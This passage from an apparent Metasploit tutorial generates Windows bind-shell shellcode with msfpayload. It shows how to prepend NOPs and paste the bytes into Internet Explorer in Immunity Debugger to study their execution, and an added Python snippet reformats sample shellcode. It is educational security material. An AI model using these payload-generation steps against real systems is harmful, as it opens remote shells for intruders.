Exploitation Using Client-Side Attacks

chapters, a bind shell simply listens on a port on a target machine to which we can connect.

root@bt:/opt/framework3/msf3# msfpayload windows/shell/bind_tcp LPORT=443 C

When these commands are executed, “stage 1” and “stage 2” shellcodes are created in the output. We are concerned only with the stage 1 shellcode, because Metasploit will handle sending the second stage for us when we connect to it. Copy and paste the shellcode from stage 1 into a text editor of your choice. You’ll need to do some minor editing before proceeding.

Now that you have your basic shellcode, add as many NOPs as you want to the beginning of it (such as \x90\x90\x90\x90\x90). Then remove all \x occurrences so that only a single, unbroken string of hex digits remains (the NOPs followed by the stage 1 bytes).


All this is necessary because you need to use a particular format so that Immunity Debugger will accept your copy-and-paste of assembly instructions. Now you have a bind shell with some NOPs in front of it for testing. Next, open up any executable—let’s use iexplore.exe for this example. Open Immunity Debugger, choose File > Open, and point to an executable. You should see a number of assembly instructions in the main window (the largest one). Left-click the first instruction on the screen, and hold down SHIFT while left-clicking to highlight about 300 instructions below it.
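The reformatting step described above (strip the \x prefixes from msfpayload's C output, put a NOP sled in front, and end up with a bare hex string that Immunity Debugger's Binary paste accepts) is easy to get wrong by hand. The following is an added Python example, not code from the book or from Metasploit; the sample bytes are a short constructed excerpt in the shape of msfpayload's C output, ending in ecc3 like the stage 1 shellcode on this page, and the function names are my own.

```python
import re

# Constructed sample in the shape of msfpayload's "C" output for one stage.
# Only a few bytes are shown; the last two (ecc3) mirror where the page says
# stage 1 ends and where the breakpoint will go.
SAMPLE_STAGE1 = r'''
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\xec\xc3";
'''

def extract_bytes(c_output: str) -> bytes:
    """Pull every \\xNN escape out of a C-format dump, in order, ignoring the
    surrounding declaration, quotes and line breaks."""
    hex_pairs = re.findall(r'\\x([0-9a-fA-F]{2})', c_output)
    return bytes(int(h, 16) for h in hex_pairs)

def to_immunity_hex(c_output: str, nop_count: int) -> str:
    """Prepend nop_count NOPs (0x90) and return the bare hex string with no
    \\x prefixes, quotes or whitespace, which is the form Immunity Debugger's
    Binary > Binary paste accepts."""
    sled = b"\x90" * nop_count
    return (sled + extract_bytes(c_output)).hex()

def sled_length(hex_blob: str) -> int:
    """Count the leading NOPs in a pasted blob, so you know exactly where the
    real instructions begin when you scroll through the disassembly."""
    data = bytes.fromhex(hex_blob)
    n = 0
    while n < len(data) and data[n] == 0x90:
        n += 1
    return n

def ends_with(hex_blob: str, tail: str) -> bool:
    """Confirm the blob ends with the expected bytes (here ecc3) before you
    set the breakpoint right after them."""
    return hex_blob.lower().endswith(tail.lower())

if __name__ == "__main__":
    blob = to_immunity_hex(SAMPLE_STAGE1, 16)
    print(blob)
    print("leading NOPs:", sled_length(blob), "ends in ecc3:", ends_with(blob, "ecc3"))
```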

Copy the shellcode to the clipboard, and right-click in the Immunity Debugger window and choose Binary > Binary paste. This will paste the assembly instructions from the example into the Immunity Debugger window. (Remember that we are doing this to identify how NOPs work and how assembly instructions are executed.)

You can see in Figure 8-1 that a number of NOPs are inserted; if you were to scroll down, you would see your shellcode.

When we first exported our shellcode in a bind_tcp format, the last instruction through stage 1 ended with ecc3. Locate the last set of memory instructions we added ending in ecc3.

Right after the ecc3, press F2 to create a breakpoint. When you add a breakpoint, once execution flow encounters it, program execution will pause and will not continue. This is important here, because the code still has a lot of the old remnants of the application we opened, and continuing would cause the application to crash, because we already inserted our own code into it. We want to stop and investigate what happened before the application crashes.